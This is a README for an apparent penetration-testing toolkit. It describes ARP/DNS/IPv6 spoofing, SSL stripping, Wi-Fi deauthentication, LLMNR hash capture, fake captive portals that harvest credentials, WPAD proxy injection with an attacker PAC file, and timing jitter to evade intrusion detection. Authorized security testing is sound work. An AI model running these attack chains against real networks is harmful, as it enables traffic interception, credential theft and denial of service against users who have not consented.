Professional-grade async Python network spoofing suite Interactive menu-driven UI · Full IPv4/IPv6 coverage · Responder-style poisoning Authorized security testing only — by amibhai
Disclaimer: This tool is for educational purposes and authorized security auditing only. The authors assume no liability and are not responsible for any misuse or damage caused by this program. Do not use this tool on networks you do not own or do not have explicit, written permission to test.
| Module | Description |
|---|---|
attacks/deauth.py |
802.11 Deauthentication — kick clients, capture WPA handshakes |
attacks/beacon_flood.py |
802.11 Beacon Flood — fake SSID storm |
attacks/llmnr_nbt.py |
LLMNR + NBT-NS + mDNS poisoning (Responder-style hash capture) |
attacks/icmpv6_ra.py |
ICMPv6 Router Advertisement spoof — IPv6 gateway hijack |
attacks/ndp_spoof.py |
IPv6 NDP Neighbor Advertisement poison — IPv6 ARP spoof |
attacks/captive_portal.py |
Captive portal (hotel/corporate/cafe/ISP templates) |
attacks/wpad.py |
WPAD proxy auto-config injection |
core/platform_compat.py |
macOS pf + Linux iptables + Windows netsh abstraction |
| Timing jitter | ±N-second random delay on every packet burst for IDS evasion |
| GitHub Actions CI | pytest + mypy + coverage gate (≥80%) across Python 3.10–3.12 |
| Docker | docker build + docker-compose up for portable deployment |
| pyproject.toml | Modern packaging, mypy strict config, ruff lint, coverage config |
| Feature | Details |
|---|---|
| Architecture | 100% async Python 3.10+ — zero threading.Thread |
| UI | Animated 256-color banner + numbered menus + breadcrumbs |
| Dashboard | PRISM live 3-panel TUI (attack log / packet stats / credentials) |
| Logging | HMAC-SHA256-chained structlog audit trail (tamper-evident) |
| Reports | Auto-generated JSON + Markdown + HTML after every session |
| Languages | Auto-detect from LANG + manual switch (en, hi, ar, zh, fr, es) |
| Preflight | 16-check system (root, Python, deps, interfaces, terminal) |
| Cleanup | Always restores ARP/NDP tables, iptables/pf rules in finally |
| Platform | Linux (full) · macOS (pf backend) · Windows (Npcap, limited) |
| Module | File | Description |
|---|---|---|
| ARP Spoofing | attacks/arp_spoof.py |
Cache poison — MitM, DoS, one-way, gateway-only |
| DNS Spoofing | attacks/dns_spoof.py |
Response injection — selective, spoof-all, rules file, NXDOMAIN |
| Combined MitM | attacks/combined_mitm.py |
Full ARP + DNS + credential capture (asyncio.TaskGroup) |
| SSL Strip | attacks/ssl_strip.py |
Transparent HTTPS downgrade proxy (Linux/macOS) |
| Rogue DHCP | attacks/rogue_dhcp.py |
Hijack default gateway via fake DHCP server (stealthy) |
| LLMNR/NBT-NS | attacks/llmnr_nbt.py |
NEW — LLMNR + NBT-NS + mDNS poisoning, NTLMv2 hash capture |
| WPAD | attacks/wpad.py |
NEW — Browser proxy auto-config injection |
| Captive Portal | attacks/captive_portal.py |
NEW — Fake login page with 4 templates |
| Module | File | Description |
|---|---|---|
| Deauth | attacks/deauth.py |
NEW — 802.11 deauthentication (targeted + broadcast), WPA handshake capture |
| Beacon Flood | attacks/beacon_flood.py |
NEW — Flood airwaves with hundreds of fake SSIDs |
| AP Scanner | attacks/deauth.py |
NEW — Passive 802.11 beacon scanner |
| Client Scanner | attacks/deauth.py |
NEW — Detect clients associated with an AP |
| Module | File | Description |
|---|---|---|
| RA Spoof | attacks/icmpv6_ra.py |
NEW — ICMPv6 Router Advertisement (default gateway hijack) |
| NDP Spoof | attacks/ndp_spoof.py |
NEW — Neighbor Advertisement poison (IPv6 ARP equivalent) |
| Full IPv6 MitM | (combo) | NEW — RA + NDP + IPv6 forwarding for complete IPv6 intercept |
# 1. Install
sudo bash install.sh
# 2. Run (interactive menu)
sudo spoof-toolkit
# 3. Or run directly
sudo python3 spoof_toolkit.py
# 4. Preflight check
sudo python3 spoof_toolkit.py --preflight
# 5. Launch PRISM dashboard directly
sudo python3 spoof_toolkit.py --prism
# 6. Docker (no install needed)
docker build -t spoof-toolkit .
docker run --rm -it --network host --cap-add NET_RAW --cap-add NET_ADMIN spoof-toolkit╔══════════════════════════════════════════════════════════════════════════╗
║ SPOOF TOOLKIT v2.1 — INTERACTIVE MENU ║
║ ║
║ Layer 2 / 3 ║
║ 1. ARP Spoofing — cache poison, MitM, DoS, one-way ║
║ 2. DNS Spoofing — domain hijack, spoof-all, NXDOMAIN ║
║ 3. Combined MitM — ARP + DNS + credential capture chain ║
║ 4. SSL Strip — HTTPS downgrade interception ║
║ 5. Rogue DHCP — gateway hijack via fake DHCP server ║
║ ║
║ 802.11 Wireless ║
║ 6. 802.11 Wireless — deauth, beacon flood, AP/client scan [NEW] ║
║ 7. LLMNR / NBT-NS — Responder-style NTLMv2 hash capture [NEW] ║
║ 8. IPv6 Attacks — RA spoof + NDP poison (IPv6 MitM) [NEW] ║
║ 9. Captive Portal — fake login page + WPAD proxy inject [NEW] ║
║ ║
║ Infrastructure ║
║ A. Wireless Adapter — detect, monitor mode, channel hop ║
║ E. Evasion — timing jitter, MAC rotate [NEW] ║
║ P. PRISM Dashboard — live 3-panel TUI attack monitor ║
║ R. Session Report — generate JSON / Markdown / HTML ║
║ F. Preflight Check — verify all dependencies and privileges ║
║ L. Language — switch UI language ║
║ 0. Exit ║
╚══════════════════════════════════════════════════════════════════════════╝
spoofing/
├── spoof_toolkit.py # Entry point — banner, preflight, main menu
├── install.sh # Auto-install (apt / pacman / dnf / brew)
├── requirements.txt # scapy, rich, aiofiles, structlog, aiohttp
├── pyproject.toml # mypy + coverage + ruff configuration [NEW]
├── Dockerfile # Portable Linux container [NEW]
├── docker-compose.yml # Compose with NET_RAW caps [NEW]
│
├── .github/workflows/ci.yml # GitHub Actions: pytest + mypy + coverage [NEW]
│
├── core/
│ ├── banner.py # Animated 256-color ASCII art banner
│ ├── preflight.py # 16-check dependency/privilege system
│ ├── menu.py # Reusable numbered menu engine + PromptHelper
│ ├── session.py # Session state dataclass (shared across all modules)
│ ├── logger.py # HMAC-SHA256-chained structlog audit logger
│ ├── reporter.py # JSON + Markdown + HTML report generator
│ └── platform_compat.py # macOS pf / Linux iptables / Windows netsh [NEW]
│
├── attacks/
│ ├── arp_spoof.py # Async ARP poisoner (mitm/dos/oneway/gateway_only)
│ ├── dns_spoof.py # Async DNS injector (selective/spoof_all/rules/nxdomain)
│ ├── combined_mitm.py # asyncio.TaskGroup orchestrator
│ ├── ssl_strip.py # Transparent HTTPS-downgrade proxy
│ ├── rogue_dhcp.py # Rogue DHCP server
│ ├── deauth.py # 802.11 deauth + AP scanner + client scanner [NEW]
│ ├── beacon_flood.py # 802.11 beacon flood (fake SSID storm) [NEW]
│ ├── llmnr_nbt.py # LLMNR + NBT-NS + mDNS poisoner [NEW]
│ ├── icmpv6_ra.py # ICMPv6 Router Advertisement spoof [NEW]
│ ├── ndp_spoof.py # IPv6 NDP Neighbor Advertisement poison [NEW]
│ ├── captive_portal.py # Fake captive portal (4 templates) [NEW]
│ └── wpad.py # WPAD proxy auto-config server [NEW]
│
├── wireless/
│ └── adapter.py # WirelessManager — detect, monitor, channel hop
│
├── capture/
│ └── credential_sniffer.py # Async extractor (HTTP/FTP/SMTP/IMAP/POP3/Telnet)
│
├── dashboard/
│ └── prism.py # PRISM live TUI — rich.Live 3-panel layout
│
├── i18n/ # UI translations (en, hi, ar, zh, fr, es)
├── rules/spoof_rules.txt # DNS spoof rules (domain → fake_ip, wildcards)
├── wordlists/domains.txt # ~170 domains for spoof-all mode
│
├── tests/
│ ├── test_arp.py # 8 tests — ARP mode, MAC random, storm detection
│ ├── test_dns.py # 10 tests — rule matching, wildcard, file parsing
│ ├── test_session.py # 17 tests — state, credentials, stats, serialize
│ ├── test_deauth.py # 12 tests — 802.11 deauth, AP scanner [NEW]
│ └── test_llmnr.py # 14 tests — LLMNR dispatch, NBT-NS decode, hash [NEW]
│
└── output/ # Reports and audit logs (gitignored)
| Mode | Poisons | IP Forwarding | Effect |
|---|---|---|---|
mitm |
Victim + Gateway | Yes (platform-aware) | Full bidirectional intercept |
dos |
Victim (dead MAC) | No | Kill victim connectivity |
oneway |
Victim only | No | Capture outbound only |
gateway_only |
Gateway only | No | Capture inbound to victim |
v2.1 additions: timing jitter (±N sec), macOS sysctl IP forwarding via platform_compat.
Deauth attack sends two frames per burst:
Frame 1: AP → client (type=0, subtype=12, reason=3)
Frame 2: client → AP (type=0, subtype=12, reason=3)
Targeted: deauth one specific client MAC
Broadcast: deauth ALL clients (addr1 = ff:ff:ff:ff:ff:ff)
Effect 1: DoS — clients disconnect and reconnect (repeated = permanent DoS)
Effect 2: WPA handshake — client re-authenticates while we sniff → capture 4-way handshake
Requires: monitor mode on wireless interface
Sends crafted 802.11 Beacon frames at ~100/s per channel.
Each beacon advertises a different fake SSID.
SSID modes:
random — 500 random 4-16 char names
funny — "FBI Surveillance Van", "router virus.exe", etc.
sequential — SSID_0000 through SSID_0999
wordlist — load from any file
list — user-specified comma-separated SSIDs
Effect: overwhelms WiFi scanners, confuses clients, radio congestion
When Windows can't resolve a hostname via DNS, it falls back to:
1. LLMNR (Link-Local Multicast Name Resolution) — UDP 5355, 224.0.0.252
2. NBT-NS (NetBIOS Name Service) — UDP 137 broadcast
3. mDNS (Bonjour/Avahi) — UDP 5353, 224.0.0.251
We respond with our IP for every query. Windows then initiates
NTLMv2 authentication, and we log the Net-NTLMv2 hash.
Hash output (hashcat -m 5600 format):
alice::CORP:AABBCCDD:EEFFAABB:<ntlmv2-response>
Export: poisoner.export_hashes("output/hashes.txt")
IPv6 hosts use NDP Router Discovery to find the default gateway.
We send unsolicited Router Advertisement (ICMPv6 type 134) claiming
to be the router. Victims route all IPv6 traffic through us.
Modes:
periodic — send RA every N seconds
responsive — sniff RS frames and reply immediately
flood — rapid RA DoS (confuses IPv6 autoconfiguration)
Includes RDNSS option (RFC 6106) to inject rogue IPv6 DNS server.
IPv6 ARP equivalent — poison the neighbor cache.
Send forged Neighbor Advertisement (NA) messages mapping a target
IPv6 address to our MAC.
Modes:
mitm — poison victim ↔ gateway (bidirectional IPv6 intercept)
dos — poison with dead MAC (kill IPv6 connectivity)
oneway — poison victim only
responsive — reply immediately to Neighbor Solicitation frames
Async aiohttp-based HTTP server serving a fake login page.
Templates:
hotel — room number / surname login
corporate — DOMAIN\username / password (triggers NTLM instinct)
cafe — email / WiFi password (on receipt)
isp — generic username / password
All credential submissions are:
1. Logged to session.captured_creds
2. Displayed live in console
3. Included in session report (JSON/MD/HTML)
4. Victim is redirected to Google after submit
Combine with:
- Rogue DHCP → victim uses us as gateway + DNS
- DNS spoof → redirect all HTTP → captive portal IP
- iptables → redirect port 80 → portal port
Browsers and OS clients look up http://wpad.{domain}/wpad.dat
for automatic proxy configuration.
Attack chain:
1. dns_spoof: wpad.* → attacker IP
2. WPADServer on port 80 serves PAC file:
function FindProxyForURL(url, host) {
return "PROXY 192.168.1.200:8080; DIRECT";
}
3. All browser traffic routes through attacker's proxy
4. ssl_strip or mitmproxy on port 8080 intercepts it
Use wpad.inject_dns_rules() to automatically add wpad.* entries
to the active DNS spoofing session.
All packet burst loops support ±N-second random delay:
session.timing_jitter = 0.5 # ±0.5s added to every 2s ARP interval
ARP: actual delay = 2.0 + uniform(-jitter, jitter), min 0.5s
DNS: small jitter (≤ 10% of jitter value) before sending forge response
Deauth: actual delay = interval + uniform(-jitter, jitter), min 0.05s
NDP: actual delay = 5.0 + uniform(-jitter, jitter), min 1s
Effect: randomizes packet timing to avoid IDS rate-based detection rules.
Set via menu: Evasion → Timing jitter
| Platform | IP Forwarding | Port Redirect | Notes |
|---|---|---|---|
| Linux | sysctl net.ipv4.ip_forward |
iptables -t nat |
Full support |
| macOS | sysctl net.inet.ip.forwarding |
pfctl anchor |
pf backend |
| Windows | Registry IPEnableRouter | netsh portproxy |
Limited, Npcap required |
from core.platform_compat import get_firewall, Platform
fw = get_firewall() # auto-selects backend
await fw.enable_ip_forwarding() # Linux: sysctl, macOS: pf
await fw.redirect_port("eth0", from_port=80, to_port=8080)
await fw.restore() # always clean up# .github/workflows/ci.yml runs on every push:
# 1. Install system deps (libpcap-dev)
# 2. mypy type-checking on core + attacks + capture + dashboard + wireless
# 3. pytest with --cov-fail-under=80 (≥80% coverage gate)
# 4. ruff lint (E,W,F,B,I)
# 5. Docker build verification# Build
docker build -t spoof-toolkit .
# Run interactive (full network access)
docker run --rm -it \
--network host \
--cap-add NET_RAW \
--cap-add NET_ADMIN \
-v $(pwd)/output:/opt/spoof-toolkit/output \
spoof-toolkit
# Run tests only (no privileges needed)
docker-compose run test
# Preflight check
docker run --rm --network host --cap-add NET_RAW spoof-toolkit --preflight# All 61 tests
python3 -m pytest tests/ -v
# With coverage report
python3 -m pytest tests/ --cov=core --cov=attacks --cov-report=term-missing
# Individual suites
python3 -m pytest tests/test_arp.py -v # 8 tests — ARP modes, MAC, storm
python3 -m pytest tests/test_dns.py -v # 10 tests — rule matching, wildcards
python3 -m pytest tests/test_session.py -v # 17 tests — state, credentials, stats
python3 -m pytest tests/test_deauth.py -v # 12 tests — deauth loop, AP scanner [NEW]
python3 -m pytest tests/test_llmnr.py -v # 14 tests — LLMNR, NBT-NS, hashes [NEW]Generated automatically on Ctrl+C and via menu:
output/
report_YYYYMMDD_HHMMSS.json — structured data + HMAC integrity hash
report_YYYYMMDD_HHMMSS.md — Markdown with tables
report_YYYYMMDD_HHMMSS.html — self-contained dark-themed HTML
session_YYYYMMDD_HHMMSS.jsonl — HMAC-chained audit log
hashes.txt — hashcat-format NTLMv2 hashes (if captured)
Verify audit chain integrity:
python3 -c "
from core.logger import HMACChainedLogger
from pathlib import Path
valid, count, err = HMACChainedLogger.verify_chain(Path('output/session_XXX.jsonl'))
print('Valid:', valid, 'Entries:', count, 'Error:', err or 'none')
"| Protocol | What is extracted |
|---|---|
| HTTP | Basic Auth (base64), POST form fields, session cookies |
| FTP | USER + PASS commands |
| Telnet | Reconstructed login stream |
| SMTP | AUTH PLAIN / AUTH LOGIN (base64 decode) |
| IMAP | LOGIN username + password |
| POP3 | USER + PASS commands |
| Captive Portal | Form credentials (any template) |
| LLMNR/NBT-NS | NTLMv2 challenge-response hashes |
# Full auto-install (Debian/Ubuntu/Arch/Fedora/macOS)
sudo bash install.sh
# Manual
pip3 install -e ".[dev]" # installs all deps + dev tools
sudo apt install aircrack-ng iw net-tools iptables # Debian/Ubuntu
brew install libpcap aircrack-ng # macOS
# Verify
python3 -m pytest tests/ -v
sudo python3 spoof_toolkit.py --preflightAsyncSniffer bridge: Scapy's AsyncSniffer runs in a background thread.
Packets forward to asyncio via run_coroutine_threadsafe() + asyncio.Queue.
HMAC audit chain: _hmac = HMAC-SHA256(prev_hmac + entry_json). Any
post-hoc modification breaks the chain — detectable via verify_chain().
Always restore: Every attack module's start() has a finally block.
ARP: 5x genuine replies. SSL Strip: iptables removed. NDP: genuine NAs sent.
Wireless: managed mode restored. Ctrl+C is always safe.
Platform abstraction: core/platform_compat.get_firewall() returns
LinuxFirewall, MacOSFirewall, or WindowsFirewall based on platform.system().
All call await fw.enable_ip_forwarding() / await fw.restore() uniformly.
Structured concurrency: Python 3.11+ uses asyncio.TaskGroup. Python 3.10
falls back to asyncio.gather. All attack tasks share one Session object.
| Priority | Improvement | Status |
|---|---|---|
| ✅ Done | GitHub Actions CI (pytest + mypy) | Shipped v2.1 |
| ✅ Done | 802.11 deauth module | Shipped v2.1 |
| ✅ Done | macOS support (pf instead of iptables) | Shipped v2.1 |
| ✅ Done | LLMNR/NBT-NS poisoning module | Shipped v2.1 |
| ✅ Done | Docker image for portable deployment | Shipped v2.1 |
| ✅ Done | Coverage gate (≥80%) + badge in README | Shipped v2.1 |
| ✅ Done | Timing jitter option for evasion | Shipped v2.1 |
| 🟡 Medium | NTLM relay (pass-the-hash) | Planned v2.2 |
| 🟡 Medium | Evil Twin AP (hostapd + DHCP) | Planned v2.2 |
| 🟢 Low | DNS rebinding attack module | Planned v2.2 |
| 🟢 Low | PCAP export (Wireshark-compatible) | Planned v2.2 |
For authorized security testing, CTF competitions, and educational use only. Running these tools against networks or systems you do not own or have explicit written permission to test is illegal in most jurisdictions (CFAA, Computer Misuse Act, etc.).
The authors accept no liability for unauthorized use.